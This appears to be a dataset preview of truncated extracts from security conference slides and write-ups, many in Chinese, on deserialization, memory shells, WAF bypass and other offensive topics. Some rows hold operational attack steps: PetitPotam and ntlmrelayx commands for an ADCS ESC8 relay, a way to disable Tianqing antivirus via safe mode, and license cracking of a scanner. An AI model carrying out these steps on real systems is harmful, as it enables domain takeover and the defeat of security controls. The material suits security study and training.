text
stringlengths
100
9.93M
category
stringclasses
11 values
I Know Where You Are: 基于LBSN APP的地理位置追踪 2015年9月15日 赵 双(DFlower) 羅夏樸(Xiapu Luo) 1 Who AM I  赵双 (DFlower, dflower.zs@gmail.com) • Insight-Labs Team 成员 (http://insight-labs.org) • 研究领域:漏洞挖掘/恶意代码分析/手机安全 • 《0day安全:软件漏洞分析技术》(第2版)作者之一 • OWASP China 2010、 Xcon 2011 Speaker  羅夏樸 (Xiapu Luo, luoxiapu@gmail.com) ...
pdf
Journey to the Center of the HP28C/S by Travis Goodspeed <travis at utk.edu> regarding the work of Paul Courbis Sébastien Lalande Disclaimer I am just the translator. My French sucks. HP 28S Photo by Kurt Moerman Part 1: Software ● Objects: List and Structure ● I/O Zone ● RAM ● Accessing Machine Language ● Further Dis...
pdf
探寻Tomcat⽂件上传流量层⾯绕waf新姿 势 探寻Tomcat⽂件上传流量层⾯绕waf新姿势 写在前⾯ Pre 前置 深⼊ 变形 更新2022-06-20 扩⼤利⽤⾯ 更新Spring 2022-06-20 Spring4 Spring5 参考⽂章 写在前⾯ ⽆意中看到ch1ng师傅的⽂章觉得很有趣,不得不感叹师傅太厉害了,但我⼀看那长篇的函 数总觉得会有更骚的东西,所幸还真的有,借此机会就发出来⼀探究竟,同时也不得不感慨 下RFC⽂档的妙处,当然本⽂针对的技术也仅仅只是在流量层⾯上waf的绕过 Pre 很神奇对吧,当然这不是终点,接下来我们就来⼀探究竟 前置 这⾥简单说⼀下师傅的思路 部署与处理上传war的servlet是 o...
pdf
惡意程式與防毒軟體之爭 伙計 NISRA 2016 NISRA 教學目的 • 提供同學們資安相關入門知識,並開啟同學們資安研究的興趣 NISRA 要感謝的人太多 那就謝天吧! NISRA 大綱 • 前言 • 我的電腦中毒了!? • 什麼是惡意程式? • 惡意程式的三種躲避偵測原理 • 防毒軟體的三道防禦機制 • 資安相關名詞與工具介紹 • 資安防護的迷思 • 補充:JS木馬簡單分析心得 NISRA 前言 NISRA 前言 NISRA 每一個人心中或多或少,都有中毒恐懼症 NISRA NISRA 不只祖克伯,FBI 局長也在筆電視訊鏡頭貼 膠帶防偷窺 [科技新報] NISRA 敵暗我明,草木皆兵 NISRA 我的電腦中毒了!? • 電...
pdf
Beyond the Lulz: Black Hat Trolling, White Hat Trolling, and Hacking the Attention Landscape SECTION 1 Are you familiar with fishing? Trolling is where you set your fishing lines in the water and then slowly go back and forth dragging the bait and hoping for a bite. Trolling on the Net is the same concept - someone ...
pdf
Who Cares Who Cares About IPv6? About IPv6? Sam Bowne Sam Bowne City College San Francisco City College San Francisco Part I Part I Who Cares? Who Cares? IPv4 Addresses: 32 Bits IPv4 Addresses: 32 Bits IPv4 address: IPv4 address: 192.168.1.10 192.168.1.10 Four bytes Four bytes In Binary: In Binary: 11000000 10...
pdf
Auditing 6LoWPAN Networks using Standard Penetration Testing Tools Adam Reziouk Airbus Defence and Space adam.reziouk@airbus.com Arnaud Lebrun Airbus Defence and Space arnaud.lebrun@airbus.com Jonathan-Christofer Demay Airbus Defence and Space jcdemay@airbus.com ABSTRACT The Internet of Things is expected to...
pdf
Servlet内存马 分类 filter 内存马是 servlet-api 内存马下的一种,也是通过接口方法动态注册 tomcat 组件。 直接查看 org.apache.catalina.core.ApplicationContext#addServlet 源代码 private ServletRegistration.Dynamic addServlet(String servletName, String servletClass,            Servlet servlet, Map<String,String> initParams) throws IllegalStateException {     ...
pdf
1 攻击 JavaWeb 应用 [JavaWeb 安全系列] 园长 MM [2013-07-04] 第 2 页 攻击 JavaWeb 应用[1] -JavaEE 基础 -园长 MM 注:本节仅让大家简单的了解 Java 一些相关知识,简要介绍了下 JavaWeb 结构和 servlet 容器以及怎么样去快速找到敏 感信息,后面的章节也是建立在此基础上。本人从未从事过网络安全行业,技术不精文中肯定有很多的错误或者不足之 处,欢迎指正,THX! 1、JavaEE 基础 JSP: 全名为 java server page,其根本是一个简化的 Servlet 设计。 Servlet:Servlet 是一种服务器端的 J...
pdf
Am I Being Spied On? Low-tech Ways Of Detecting High-tech Surveillance Dr. Phil @ppolstra http://philpolstra.com What this talk is about ● Determining if you are a victim of spying – Video surveillance – Tailing – Audio eavesdropping – Devices embedded in your computer, tablet, or smart phone Why you should care ● Go...
pdf
Outline Background Meddle Framework XRDP Fuzzing DeviceIoControl Sandbox Conclusion Meddle: Framework for piggy-back fuzzing and tool development Geo↵ McDonald glmcdona@gmail.com, unaffiliated presentation August 8, 2014 DEF CON 22 Geo↵ McDonald glmcdona@gmail.com, unaffiliated presentation Meddle: Framework for piggy-back...
pdf
0x00 0x01 web swingsakurawebpandap webweb webweb uaf webidaida C++ webpwn sakuraweb 6 web SQLsqlitesqlite pwn smugglingssrf127.0.0.1redisSSRFpwnwebpwn 0x02 httpd.conf mpm_worker_module modules/mod_mpm_worker.so // auth_kerb_module modules/mod_auth_kerb.so //kerberos authn_core_module modules/mod_authn_core.so /...
pdf
1 <Change information classification in footer> © Nokia 2016 Bell Labs Bell Labs 4G - Who is paying your cellular phone bill? Silke Holtmanns Isha Singh Nokia Bell Labs 2 <Change information classification in footer> © Nokia 2016 Bell Labs Bell Labs Industrial Security Research? 3 Bell Labs •  Theoret...
pdf
Securing Linux Systems with AppArmor Crispin Cowan, PhD Director of Software Engineering Security Architect, SUSE Linux AppArmor: Easy-to-use Security for Ubuntu Linux Crispin Cowan, PhD Security Architect, SUSE What Is This 'AppArmor' Thing and Why Should I Care? © Novell Inc. All rights reserved 3 Agenda Overview A...
pdf
AfriNIC 1.48% ARIN 27% RIPE NCC 29.79% APNIC 36.51% LACNIC 5.23% IPv4 Address Space Status RIR allocations IPv4 /8s Remaining As of 31 March 2010 Available /8s As of 31 March 2010 IPv4 Allocations by RIR January 1999 - March 2010 Available 8.59% Allocated 77.74% Unavailable 13.67% GLOBAL IP ADDRESSING STATISTICS For m...
pdf
1 浅谈Goby Redteam版本破解 前⾔ 基础信息收集 尝试破解 从官⽅获取Goby Redteam版本 作者:天河 Goby是⼀款新的⽹络安全测试⼯具,由赵武Zwell(Pangolin、JSky、FOFA作者)打造,它能够 针对⼀个⽬标企业梳理最全的攻击⾯信息,同时能进⾏⾼效、实战化漏洞扫描,并快速地从⼀个 验证⼊⼝点,切换到横向。我们希望能够输出更具⽣命⼒的⼯具,能够对标⿊客的实际能⼒,帮 助企业来有效地理解和应对⽹络攻击。 前⼏天在⽹络上冲浪,偶然得知goby还有Redteam版本,发现⽹络上并没有Redteam版本的破解版。 也没有相关的破解⽂章,因此我对goby的验证体系产⽣了好奇。考虑到开发者利益这⾥不展示具...
pdf
MySQL-JDBC反序列化 漏洞原理 参考文章: eu-19-Zhang-New-Exploit-Technique-In-Java-Deserialization-Attack 小白看得懂的MySQL JDBC 反序列化漏洞分析 MySQL JDBC 客户端反序列化漏洞分析 MySQL JDBC反序列化漏洞 上面这个是BlackHat Europe 2019议题中的利用链,在连接数据库的过程中可以触发漏洞。连接 的条件: jdbc:mysql://attacker/db? queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor ...
pdf
Threat Data Visualization Steve Ginty Brandon Dixon July 18th 2013 Verisign Confidential 2 Verisign Confidential and Proprietary • Identify the problem • Discuss the solution • Walk through use targeted attack use case • Identify caveats • Conclusion Overview and Agenda 3 Verisign Confidential and Proprietary • Attack’...
pdf
Jenkins CVE-2018-1000861 内存马注 ⼊ Jenkins 介绍 Jenkins是⼀个开源的、提供友好操作界⾯的持续集成(CI)⼯具,在企业中使⽤⾮常⼴泛 相关分析可以看 l1nk3r 师傅的⽂章:https://xz.aliyun.com/t/6361 作者 Orange 分析:https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html 前⾔ Jenkins 低版本下 (Jenkins <= 2.137 ) 我们可以在未授权的情况下通过 groovy 来进⾏命令执⾏, ⽽且利⽤⽅式也⾮ 常简单只需要发...
pdf
研发运营安全白皮书 (2020年) 云计算开源产业联盟 OpenSource Cloud Alliance for industry,OSCAR 2020年7月 版权声明 本白皮书版权属于云计算开源产业联盟,并受法律保护。 转载、摘编或利用其它方式使用本调查报告文字或者观点的, 应注明“来源:云计算开源产业联盟”。违反上述声明者,本联 盟将追究其相关法律责任。 前 言 近年来,安全事件频发,究其原因,软件应用服务自身存在代码 安全漏洞,被黑客利用攻击是导致安全事件发生的关键因素之一。随 着信息化的发展,软件应用服务正在潜移默化的改变着生活的各个方 面,渗透到各个行业和领域,其自身安全问题也愈发成为业界关注的 焦点。...
pdf
listener Listener的介绍 1. Listener 的分类 tomcat 中 Listener 分为两类, org.apache.catalina.LifecycleListener 以及 java 原生的 Java.util.EvenListener ,其中 LifecycleListener 是为了监听 tomcat 的各个容器的生命周 期的,比如 StandardEngine , StandardHost , StandardContext , StandardWrapper 这些容 器的启动,关闭等等。这些监听处在的位置为容器启动,此时 servlet 未建立, request 请求未 创建,不适合用于创建内存...
pdf
author: pen4uin 开始之前 这篇文章(笔记)理论上是在两个月前就应该完成的,由于前段时间手头活有点 多,就给落下了。 但是,最近因为疫情防控的原因,回了学校开始远程实习,而且我的秋招也差 不多算结束了,所以目前自我安排的时间相对来说毕竟富余。正好趁国庆小长假好好 把前4个月(HW — 现在)的笔记捋一捋、总结归档,也算是为这一年多的实习生活画 上一个句号,调整心态迎接下一段"社畜"生活的开始👀! Resin "特性" 问题描述 测试文件 "特性"场景 step1-上传文件 在写某微OA的文件上传漏洞的EXP时,发现上传jsp文件后,即使jsp文件自删除后仍然 可以访问(坑了...
pdf
David Meléndez Cano David Meléndez Cano R&D Embedded Systems Engineer @taiksontexas Taiksonprojects.blogspot.com Project “The Interceptor”: Owning anti-drone systems with nanodrones David Meléndez Cano @TaiksonTexas ● R&D Embedded Software Engineer in Albalá Ingenieros, S.A. Spain ● Author of the robots: "Atropos" & "T...
pdf
Malicious CDNs: Identifying Zbot Domains en Masse via SSL Certificates and Bipartite Graphs Dhia Mahjoub and Thomas Mathew Overview • The goal of this talk is to provide a series of simple statistical methods that allow a researcher to identify ZBot domains using SSL data • All of the data discussed is open source ...
pdf
ESC8是一个http的ntlm relay,原因在于ADCS的认证中支持ntlm认证。 默认即存在 下面开始攻击复现,首先我们需要搭建一个辅助域控 勾选域服务 安装即可,同理设置为域控 选择添加到现有域 选择从主域复制 重启后测试: 下面即可开始攻击。 1 python3 Petitpotam.py ‐u '' ‐d '' ‐p '' "ntlmrelay address" "DC02 addres s" 1 ntlmrelayx.py ‐t http://adcs/certsrv/certfnsh.asp ‐smb2support ‐‐adcs ‐‐t emplate 'DCTest' 获取到证书 然后使用证书请求DC02$的票...
pdf
1 ⼀次jsp上传绕过的思考 背景 解决⽅案 jsp利⽤EL表达式绕过 jspx利⽤命名空间绕过 jspx利⽤<jsp:expression>绕过 @yzddmr6 前⼏天有个⼩伙伴做项⽬的时候遇到⼀个问题来问我,⼤概情况如下: 1. jsp的站,可以任意⽂件上传 2. 上传jsp会把<%中的<给转义掉 3. 上传jspx会把<jsp:scriptlet>到</jsp:scriptlet>中的内容替换为空 问有什么突破办法? 背景 2 当时研究了⼀下后jsp和jspx各给了⼀个解决⽅案,发到星球⾥后@hosch3n师傅⼜给了⼀种⽅案,tql 其实问题等价于: 1. jsp不使⽤<% %>标签如何执⾏命令 2. jspx不使⽤<jsp...
pdf
Spartan 0day & Exploit exp-sky who am i • Tencent’s Xuanwu Lab • The security of browser • Vulnerability discovery • Exploit technique • APT attacks detection Spartan 0day & Exploit • 1、Isolation Heap • 2、Memory Protection • 3、Spartan Memory Manage • 4、CFG • 5、Exploit Bypass All • 6、0day • 7、Q&A Isolation Hea...
pdf
S-shiro550 前言 环境搭建 1. 参考文章: Shiro 反序列化记录 Shiro RememberMe 1.2.4 反序列化导致的命令执行漏洞 2. 远程调试: tomcat 启动修改,新建 debug.bat 文件,内容如下。 IDEA 配置远程 Tomcat 服务器。 set JPDA_ADDRESS=8000 set JPDA_TRANSPORT=dt_socket set CATALINA_OPTS=-server -Xdebug -Xnoagent -Djava.compiler=NONE - Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=8...
pdf
ByteCTF WriteUp by Nu1L Author: Nu1L ByteCTF WriteUp by Nu1L PWN easyheap gun Misc Double Game PT Site survey checkin WEB douyin_video jvav Reverse QIAO DaShen Decode AES CrackMe PWN easyheap from pwn import * # s = process("./easyheap",env={'LD_PRELOAD':"./libc-2.31.so"}) # s = process("./easyheap") s = remote("123.56...
pdf
Hardware Black Magic: Building devices with FPGAs Dr. Fouad Kiamilev, Professor CVORG Labs Electrical and Computer Engineering University of Delaware http://cvorg.ece.udel.edu Updated Slides and Video Updated slides as well as video tutorials will be available after the conference on our website at http://www.cvor...
pdf
零、前⾔ ⼗⼀本来打算不卷了,好好放松放松,但是⼏个事情对我触动⽐较⼤,所以就⼜给⾃⼰设了个搞懂 RMI 反序列化相 关攻击的学习⽬标。 再加上⼀是为后续深⼊ IIOP/T3 打下基础,⼆是最近⼀位师傅问了我关于利⽤ RMI 回显的思路,帮师傅搞了半天没 有搞定,怪我之前对 RMI 只是浅浅的了解,甚⾄都算不上会,没能帮上这位师傅的忙,很是⾃责,所以花点时间学 ⼀学。 这部分的实现略有复杂,本⽂在写的时候也是深感吃⼒,RMI 相关的⽂章在⽹上乱七⼋糟,由于⼜涉及到安全更新 和绕过,之前看了⼏次看的头晕眼花,这次趁着有空梳理⼀下。 个⼈能⼒有限,如有理解错误及偏差,请不吝赐教。 ⼀、RMI 介绍 RMI (Remote Method ...
pdf
                 ! " # $ % &  # ' ( ) ) * ) + * ) , ( - ' ( ) ' . + % / 0 1 2 3 4 5 2 6  7 8  8 " #  # 7 9 "  9 : 7 ; 8  " 7 " # 9 ; < = # 7 9 " # 9 #   = # 9 " 7 = " # > 9 ? 8  8 " # 9 "   # @ 9 ;   < # 9 @ 9 A 7  8 ! 6  8 " # > 9 ? 8 > 7   A ; 8 = 7 A ;  9 9 8  B C 9   9 > 7 " D ...
pdf
Managed Code Rootkits Managed Code Rootkits Hooking into Runtime Environments Hooking into Runtime Environments Erez Metula, Erez Metula, Secure Software Engineer Secure Software Engineer Application Security Department Manager, 2BSecure Application Security Department Manager, 2BSecure ErezMetula@2bsecure.co.il Ere...
pdf
前言 周六晚上,本来打开电影网站准备看电影的时候,导师发来张图,说这个 exe 在添加进启动项的时候, 360没有拦截,就想着我们能不能也利用下。 先说结论:分析后我个人感觉利用难度较大,价值不高,如果有师傅可以成功利用的话,请疯狂call 我!!! 首先我的第一反应是白加黑,但很快被当头一棒,不能想当然。还是要老老实实分析,切忌主观臆断。 先了解下这个程序,看到这里喜忧参半,看描述似乎确实有木马伪装成这个程序,但这个程序有签名。 下面要做的就是分析这个程序的加载方式了,这里我选择的火绒剑来监控。 首先删除这个注册表项,然后重装vmtools,安装完成后, vmtoolsd.exe 会被写进启动项。我们做的 就是分析安装过程中,该值...
pdf
Smishsmash Blackhat 2022 About us Thomas Olofsson ● Digital Nomad (many homes) ● Founder sec-t.org ● Co-founder FYEO Inc ● Winner defcon CTFs ages ago ● Secure coding and development ● Likes threat actor research and incident investigations thomas@gofyeo.com Twitter: @skjortan Mikael Bystrom ● Hardware and software h...
pdf
Hardware Hacking for Software Geeks David Gustin and Ab3nd Introduction ● Why this talk? ● Building a lab ● Tools ● Forward Engineering ● Reverse Engineering Building a Lab ● Space ● Ventilation ● Lighting ● Work surfaces ● Grounding Soldering ● Iron selection ● Solder selection ● Practicing ● Limits of human ability A...
pdf
About • 阿里巴巴移动安全专家 • 曾发现谷歌,苹果等众多国 内外知名公司漏洞 • 擅长windows安全, andrdoid安全,漏洞挖掘 • 支付宝钱包终端攻防对抗组 的负责人 • 客户端技术专家 • 主要移动端逆向、漏洞挖掘、 防护 dragonltx 曲和 Alipay.unLimit.Security.Team 1 第三方库安全现状 2 攻击Android第三方库 3 Fuzz*Android第三方库 4 第三方库安全思考 5 Q&A Agenda Part. 01 第三方库安全现状 3 探索⼀切、攻破⼀切 | [ Hacker@KCon ] 探索⼀切、攻破⼀切 | [ Hacker@KCon ] 探索⼀切、攻破⼀...
pdf
mainframed767 & bigendiansmalls B.U.M. Corp. Confidential Security Necromancy: Further Adventures in Mainframe Hacking mainframed767 & bigendiansmalls B.U.M. Corp. Confidential B.U.M. Corp. Confidential Genesis •  Wondered: Who’s researching this shit? – Windows 4,951 – Mac OSX 2,270 – z/OS (ma...
pdf
The Psychology of Computer Insecurity Peter Gutmann University of Auckland Why can’t users get security right? Users are idiots • Developers build security applications • Users apply them incorrectly • Users are idiots • QED Why can’t users get security right? OK, so users are irrational Definition: “Rational” • How ge...
pdf
July 19, 2005 C 1 Hacking from WEB 行政院 國家資通安全會報 技術服務中心 For HIT2005 Charmi Lin C 2 前言 •網站伺服器(Web Server),幾乎是每一個 組織單位在網際網路上都必須要提供的網 路服務。 •WEB管理失當的危險 C 3 常見的WEB弱點 • 伺服器應用程式Buffer Overflow • MISConfiguration(配置失當) • 使用者輸入驗證上的錯誤 • 網頁程式邏輯上的錯誤 • 程式輸出錯誤 • 密碼管制失當 C 4 Buffer Overflow •常被使用也最容易修補、發現 •修補方式僅需安裝廠商的修補程式即可 C 5 MISConf...
pdf
Trustedsec ELFLoader 原理简析 0x01 简介 各类的 elfloader 一般都是内存解析或读取 elf 文件而后执行。其中有简单的例如之前讲到的 Linux 无文件攻击姿势,但是缺点也很明显例如 proc 特征、无法保护 load 的文件。今天分析 一个另一种类型的 eldloader,简要分析一下是如何实现的。项目为 trustedsec 出品 (https://github.com/trustedsec/ELFLoader)。 0x02 Loader 技术细节 查看项目结构。 主要功能实现逻辑都在 ELFLoader.c 中,为了能跨平台运行可以看到做了一些适配性工作, 将大部分类如输出打印、字符处理等函...
pdf
Embedded System Design: From Electronics to Microkernel Development Rodrigo Maximiano Antunes de Almeida E-mail: rmaalmeida@gmail.com Twitter: @rmaalmeida Universidade Federal de Itajubá Creative Commons License The work ”Embedded System Design: From Electronics to Microkernel Development” of Rodrigo Maximiano Antunes...
pdf
Computer Science / www.isec.utulsa.edu How to Hack Your Mini Cooper: Reverse Engineering CAN Messages on Passenger Automobiles Jason Staggs Computer Science / www.isec.utulsa.edu Who is this guy? • Jason Staggs – Graduate Research Assistant • Institute for Information Security (iSec) • Crash Reconstruction R...
pdf
The Big Picture:  Digital Cinema Technology and Security Mike Renlund Digital Cinema Specialist Film: How its always been done • 35mm film is the standard, more than a mile  of it for one movie. • IMAX film is 10 times larger than 35mm. • The image hasn’t been upgraded much in the  more than a century that movies have ...
pdf
SRC 1. IP 2. 1.SSL 2. 3.Github 4.DNS 5. SSL 12 SRC SSL 1.censys.io 2.crt.sh 1.riskiq 2.shodan 3.findsubdomains [] [] 4.censys.io 5.dnsdb.io DNS SSLGithub crt.shnss.a.com Github ​ ​ GET ​ json ​ fastjson ​ ​ Github github IP IPASIP IP : http://IPwhois.cnnic.net.cn/ 123.58.191.1 [IP] ​ IP ​ Netease-Network ​ IPNetea...
pdf
> Nicolas FISCHBACH IP Engineering Manager - COLT Telecom nico@securite.org - http://www.securite.org/nico/ > Sébastien LACOSTE-SERIS IP R&D Manager, Security Officer - COLT Telecom kaneda@securite.org - http://www.securite.org/kaneda/ version 1.0 Layer 2, routing protocols, router security & forensics © 2002 Sécurité...
pdf
DCFluX in: The Man with the Soldering Gun Presented By: Matt Krick, DCFluX – K3MK Chief Engineer, New West Broadcasting Systems, Inc. DEFCON 17 Las Vegas, NV Thursday July 30, 2009; 16:00 – 16:50 The following presentation has been edited to run in the time allotted. Hidden Agenda 1. Safety 2. Solder 3. FluX on: F...
pdf
OPTIGUARD: A SMART METER ASSESSMENT TOOLKIT July 14, 2012 Presented by: INGUARDIANS, INC. Don C. Weber, Senior Security Analyst don@inguardians.com White Paper OptiGuard: A Smart Meter Assessment Toolkit 2 July 14, 2012 Copyright 2012 InGuardians, Inc. TABLE OF CONTENTS 1.0 Role of Smart Meters__________...
pdf
前⾔: 由于本次靶场环境L.N.前辈给的权限是直接在内⽹的权限,所以缺少了实战中最艰难且必不可少的⼀ 环,那就是⼊⼝点的获取,以下wp是模拟实战中vpn配置⽂件泄漏导致内⽹沦陷的过程 1⼊⼝点 模拟vpn配置⽂件泄漏,连接后发现分配ip如下 然后我们尝试扫描10.10.0/16段的常规端⼝和banner以及⼀些常⽤漏洞 发现简易脆弱点如下 10.10.22.161 windows rpc调⽤可能存在ssrf 配合401中继 10.10.24.52存在sql注⼊以及main.php⽂件任意写 10.10.22.44 ajp 10.10.22.67 17010 03 x86 10.10.26.151 ajp 最终选择攻击最简单的 通过f...
pdf
#BHUSA @BlackHatEvents Tunable Replica Circuit for Fault- Injection Detection Daniel Nemiroff Carlos Tokunaga • Fault‐Injection Attack Basics • Dive into the TRC (Tunable Replica Circuit) • Why and How Intel Integrated the TRC • TRC Calibration and Validation • Conclusions and Productization Non‐Invasive FI Attacks • T...
pdf
COMMON VULNERABILITIES COMMON VULNERABILITIES In this document you can find common vulnerabilities that are reported commonly. We believe that verifying this list and fixing these issues or adding it to out of scope ahead of the start of the project might save you some budget! EXCESSIVE INFORMATION LEAKAGE TROUGH ERR...
pdf
欢迎参加 BlueHat Shanghai Eric Doerr 微软安全响应中心总经理 @edoerr May 30, 2019 2019 年,中国的安全研究员是微软漏洞赏金 计划中成果最多,影响力最大的贡献者 增长 57% 来自中国的漏 洞赏金计划参 与者 46% 来自中国的漏 洞赏金计划提 交成果 2018 vs 2019 影响力 中国,48% 全球,52% 漏洞赏金计划奖金 中国,22% 全球,78% 符合漏洞赏金计划要求的提交 2018 vs 2019 侧重点 2019 所提交漏洞类型的划分 内存安全问题 56% 信息泄露 15% 微软漏洞赏金计划 Microsoft Office Insider Microsoft...
pdf
Common Vulnerabilities on Forget Password Functionality User Enumeration Missing Rate Limiting SQL Injection Cross-Site Scripting Text Injection/Content Spoofing HTML Injection in Email Password Reset Poisoning via Host Header Injection Re-usable Password Reset Token No Expiration on Password Reset T...
pdf
1 bof⼩测 ⼀个正常C程序,如何转换成bof⽂件,这⾥记录下过程 bof的原理实现就不多讲了,简单来说就是编译成⼀个object⽂件(COFF格式,exe是PE格式),然后 传输给beacon后在终端上完成链接过程,这也就导致bof⽂件⾮常⼩,⼀般只有⼏K。 参考 https://wbglil.gitbook.io/cobalt-strike/cobalt-strike-yuan-li-jie-shao/untitled-3 在github有⼏个不错的开源项⽬,可以以此为模板进⼀步开发,⽽不需要完全重头开始。 https://github.com/trustedsec/CS-Situational-Awareness-...
pdf
2021年7月26日 群精华总结 概述 问题1:创建服务做自启动的时候出现“占位程序接收到错误数据”的错误 问题2:powershell加载dll反射执行错误 问题3:openfire管理员账号密码在哪儿? 问题4:怎么查询域管理员在域内哪台机器上登录了? 问题5:想问下免杀里面申请到内存后((void(*)())exec)();这个是啥意思呢? 问题1:创建服务做自启动的时候出现“占位程序接收到错误数据”的错误 解决:复制sc.exe到其他目录,然后重命名sc.exe,再执行创建服务,解决问题。 问题2:powershell加载dll反射执行错误 解决:Add-Type -LiteralPath "c:\xxx\ddd.dll" ...
pdf
Convert to Electric Vehicles 2009 Electric Auto Association (EAA) “Promoting the use of electric vehicles since 1967” Electro Automotive VoltsRabbit Acterra EV Conversion Project DC Motor Example components Why Build an EV? Today there are limited production electric vehicles available, so converting an e...
pdf
掃吧你!從協議面抓出機歪的 遠端桌面後門 orange@chroot.org About Me •  蔡政達 aka Orange •  CHROOT 成員 •  DEVCORE Security Consultant •  HITCON, PHPCONF, PYCON …等講師 •  揭露過 Microsoft, Django, Yahoo …等漏洞 •  專精於駭客手法、Web Security 與網路滲透 水議題? 老議題? old issue ? yes, it is. 遠端桌面後門? Remote Desktop Backdoor ? 遠端桌面 "相黏鍵" 後門? R...
pdf
Live-Fire Exercise: Baltic Cyber Shield 2010 Kenneth Geers Naval Criminal Investigative Service (NCIS) Cooperative Cyber Defence Centre of Excellence (CCD COE) Overview • May 10-11, 2010 • International cyber defense exercise (CDX) • CCD CoE / Swedish National Defence College • Six Blue Teams – Northern European gov, m...
pdf
7/7/13 IPython Notebook localhost:8888/a1253220-71b8-49cd-bd84-1d0edbd6bd60/print 1/7 In [56]: In [57]: High level stats In [58]: Epoc to datetime In [60]: In [61]: Device discovery over time In [62]: import pandas import json import os import datetime #the following is the path to your client json files data_path=".....
pdf
Oracle Penetration Testing Using the Metasploit Framework Chris Gates & Mario Ceballos Metasploit Project Abstract Over the years there have been tons of Oracle exploits, SQL Injection vulnerabilities, and post exploitation tricks and tools that had no order, methodology, or standardization, mainly just random .sql ...
pdf
公司介绍: • 宜信——创立于2006年,从事普惠金融和财富管理事业的金融科技企业。在支付、 网贷、众筹、机器人投顾、智能保险、区块链等前沿领域积极布局,通过业务孵化和 产业投资参与全球金融科技创新。 • 成立十二年以来,始终坚持以理念创新、模式创新和技术创新服务中国高成长性人群、 大众富裕阶层和高净值人士,真正的让金融更美好。 宜人宜己,美好生活 部门介绍: • 宜信安全部直属于宜信总公司,承接总部及所有子公司的安全需求,为公司的业务安全保驾护航。 ※安全部成4年以来,弥补了公司安全基础建设的缺失,发展至今组建了覆盖网络、应用、主机、终端、 数据逐层渗透的前沿安全架构,每一步都凝聚着肩负亿万用户信息和财产安全的责任。 ※ 2018...
pdf
Montana State Representative Daniel Zolnikov Politics and The Surveillance State. The Story of a Young Politician’s Successful Efforts to Fight Surveillance and Pass the Nation’s Strongest Privacy Bills. About Daniel • From Roundup, Montana. • 31 Years Old. First Served at 25 Years Old. • Chair of House Energy and T...
pdf
2021-Web-HarderXSS banfrom hint:"cookiedomain" set-cookiedomaincookie def md5(s): return hashlib.md5(s).hexdigest() def verify(s): for i in range(1, 9999999): if md5(str(i).encode("utf8")).startswith(s): return(i) break print(verify("6febd")) bot adminadmin admindisplay:none ssr...
pdf
msfconsole | tee 1.txt ​ app 0x00 0x01 0x02 ​ while true do if [ ! -n "$1" ] ;then keyword="successful" else keyword=$1 fi result=$(tail -n 1 1.txt | grep $keyword) if test ! -z "$result"; then wget --output-document=/dev/nu...
pdf
Countering Denial of Information Attacks Gregory Conti www.cc.gatech.edu/~conti conti@acm.org Original Photos: National Geographic, Photoshopper: Unknown Disclaimer The views expressed in this presentation are those of the author and do not reflect the official policy or position of the United States Military Ac...
pdf
Analysis Report Sample 172AED81C4FDE1CF23F1615ACEDFAD65 Author Marion Marschalek [marion-m@live.at] Date 24/03/2013 Abstract The analyzed sample, detected as Backdoor.Win32.Banito, is multi-threaded malware that infects files on the disk, communicates to a remote server under the domain ns.dns3-domain.com and...
pdf
0x01 前奏 前不久在挖掘某SRC时提交漏洞时,偶然在该SRC官⽹的编辑器发现了⼀个接⼝。 起初以为是任意⽂件包含能RCE了,后来测试发现只是拼接读取了远程资源站的图⽚,原本都想着放弃了,但是当 我在后缀添加了个+号后图⽚被意外的解析成了HTML⻚⾯,这不就意味着get到⼀个存储型XSS? https://xxx.cn/xxxx/ueditor?image_name=/xxx.png+ 接着测试发现拼接图⽚在⼀个⼆级⽬录下,尝试穿越发现存在⾃研WAF,于是Fuzz了下Payload成功Bypass。 #####WAF: #####Bypass: Payload: 0x02 漏洞利⽤ 1. 利⽤010Editor或copy命令,制...
pdf
© 2012 Presented by: Home Invasion v2.0 Attacking Network-Controlled Embedded Devices Daniel “unicornFurn © 2012 © 2012 • Who are we? © 2012 The Presenters • Daniel “unicornFurnace” Crowley – Managing Consultant, Trustwave (SpiderLabs team) • Jennifer “savagejen” Savage – Software Engineer, Tabbedout • David “videoman...
pdf
How to get good seats in the security theater? Hacking boarding passes for fun and profit Przemek Jaroszewski przemj+defcon24@gmail.com $ whoami • head of Current Threat Analysis team at the Polish national CSIRT (CERT Polska) • 10+ years of education in programming • Master’s degree in social psychology • 15 years o...
pdf
HVV 之不需要密码永久退出 LM 天擎 1. 又要到护网了,还记得去年护网客户问我天擎退出密码是多少,说想安装软件 安装不上去。 2. 我心想,好家伙,这谁家的软件这么流氓。 3. 不需要逆向这么麻烦的方法,其实很简单,重启之后进入安全模式,这个时 候天擎是没有启动的。 4. 然后进入天擎的安装目录,这个时候天擎的安装目录名称是 Tianqing 5. 然后把目录修改成 Tianqing6666 6. 最后重启进入正常模式,因为目录名字变了,天擎的自启动也就失效了. 7. 如果后面用到的时候手动启动 TQSafeUI.exe 就可以了
pdf
【手機鑑識技術及實務分享】 鑒真數位有限公司 黃敬博 (po@iforensics.com.tw) 時間:2011/07/23 Page  2 Agenda Trend of Mobile Forensics Smart Phone Forensics Focus Commercial Solutions Q & A Page  3 Mobile Phone Subscribers Page  4 Computers versus Mobiles Mobiles are supplanting traditional computing – it is now predicted by the end of 2011, th...
pdf
Bypass firewalls, application white lists, secure remote desktops in 20 seconds Zoltan Balazs DEF CON 22, 2014 root@kali:~# whoami Zoltán Balázs root@kali:~# whoami root@kali:~# whoami AV testing AV bypass root@kali:~# whoami OSCP: Occasional Satire Captain Punk CISSP: Certified Interspecie-ial Sheep Shearing Profess...
pdf
Before the FEDERAL COMMUNICATIONS COMMISSION Washington, DC 20554 In the Matter of ) ) Unlicensed Operation in the TV Broadcast ) ET Docket No. 04-186 Bands ) ) ET Docket No. 02-380 Additional Spectrum for Unlicensed Devices ) Below 900 MHz and in the 3 GHz Band ) To: The Commission JOINT COMMENTS...
pdf
Page 1 of 37 Whitepaper: Bypassing Port Security In 2018 – Defeating MACsec and 802.1x-2010 DEF CON 26 Pre-Release Version Gabriel Ryan (@s0lst1c3) August 2018 Last Modified: 7/20/18 6:44:00 AM Page 2 of 37 Disclaimer and Updates This whitepaper is an early version designed for pre-release prior to DEF CON 26. ...
pdf
